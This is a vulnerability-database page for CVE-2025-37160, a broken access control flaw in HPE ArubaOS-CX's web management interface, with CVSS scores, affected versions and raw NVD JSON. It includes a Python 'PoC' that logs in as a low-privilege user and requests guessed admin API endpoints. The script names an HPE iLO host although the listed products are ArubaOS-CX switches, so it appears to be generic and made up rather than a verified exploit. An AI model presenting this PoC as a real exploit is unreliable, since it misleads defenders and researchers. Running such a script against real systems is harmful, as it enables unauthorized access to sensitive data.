Security Vulnerability Report
中文
CVE-2025-37160 CVSS 5.3 MEDIUM

CVE-2025-37160

Published: 2025-11-18 19:15:48
Last Modified: 2025-12-04 18:18:13
Source: [email protected]

Description

A broken access control (BAC) vulnerability in the web-based management interface could allow an authenticated remote attacker with low privileges to view sensitive information. Successful exploitation of this vulnerability could enable the attacker to disclose sensitive data.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:* - VULNERABLE
HPE iLO - 具体版本需参照HPE官方安全公告hpesbnw04888en_us
HPE web-based management interface - 未知版本 (待官方确认)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37160 PoC - Broken Access Control in HPE Web Management # Requires low-privilege authenticated user credentials import requests import sys TARGET_HOST = "https://target-hpe-ilo.local" USERNAME = "low_privilege_user" PASSWORD = "password123" def exploit(): """ This PoC demonstrates the broken access control vulnerability where a low-privilege user can access sensitive admin information """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_HOST}/api/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_data, verify=False) if response.status_code != 200: print("[-] Authentication failed") return False print("[+] Successfully authenticated with low-privilege account") # Step 2: Exploit broken access control to access admin endpoints # These endpoints should require admin privileges sensitive_endpoints = [ "/api/admin/users", "/api/admin/configurations", "/api/admin/system-info" ] for endpoint in sensitive_endpoints: url = f"{TARGET_HOST}{endpoint}" response = session.get(url, verify=False) if response.status_code == 200: print(f"[+] Exploited! Accessed sensitive endpoint: {endpoint}") print(f" Data: {response.text[:200]}...") else: print(f"[-] Endpoint {endpoint} returned status {response.status_code}") return True if __name__ == "__main__": print("CVE-2025-37160 PoC - HPE Web Management BAC Vulnerability") exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37160", "sourceIdentifier": "[email protected]", "published": "2025-11-18T19:15:48.133", "lastModified": "2025-12-04T18:18:12.610", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A broken access control (BAC) vulnerability in the web-based management interface could allow an authenticated remote attacker with low privileges to view sensitive information. Successful exploitation of this vulnerability could enable the attacker to disclose sensitive data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.10.0000", "versionEndExcluding": "10.10.1170", "matchCriteriaId": "3FEB3830-A052-4585-BF45-9E221FA06D43"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.13.0000", "versionEndExcluding": "10.13.1101", "matchCriteriaId": "0490B2CA-4273-426E-8776-814D242834B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.14.0000", "versionEndExcluding": "10.14.1060", "matchCriteriaId": "21AC81E3-A4C8-4120-AEEA-46123B84A250"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.15.0000", "versionEndExcluding": "10.15.1030", "matchCriteriaId": "FB5ADE5E-72CB-41E0-B7A0-08BEBB94ED8E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:hpe:arubaos-cx:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.16.0000", "versionEndExcluding": "10.16.1001", "matchCriteriaId": "5CF58D01-F13F-4DAF-B6A1-D91AEC7F19B3"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.